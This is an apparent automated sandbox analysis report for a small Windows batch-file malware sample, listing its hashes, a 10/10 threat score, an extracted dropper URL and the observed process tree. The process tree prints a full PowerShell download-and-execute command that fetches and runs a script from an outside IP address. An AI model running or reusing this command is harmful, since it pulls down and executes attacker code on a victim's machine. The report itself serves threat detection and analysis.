Analysis
-
max time kernel
131s -
max time network
74s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
02-06-2020 10:10
Static task
static1
Behavioral task
behavioral1
Sample
b0d58156fab428d26b46727824eabf37.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
b0d58156fab428d26b46727824eabf37.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
b0d58156fab428d26b46727824eabf37.bat
-
Size
214B
-
MD5
80701ef329f0effbde1182ab9f26be31
-
SHA1
b948c5f5d1d8d2f7bb793db6ed2119d8143b8084
-
SHA256
bfecfd11f233e3531ec0241d1186c28fd737e3b476a51e4000312296ab8c0c1c
-
SHA512
f2a24c2587f2621b2a9d571522a4e0126af41f482d2e942579c199acacb98a4783dd03f06635173f59c6e37c2ad55f8778a7c0841e4848dee533ddf232ce5b9d
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/b0d58156fab428d26b46727824eabf37
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2148 1840 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 2148 WerFault.exe Token: SeBackupPrivilege 2148 WerFault.exe Token: SeDebugPrivilege 2148 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b0d58156fab428d26b46727824eabf37.bat"1⤵PID:1572
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b0d58156fab428d26b46727824eabf37');Invoke-XXZLMCF;Start-Sleep -s 10000"2⤵PID:1840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2148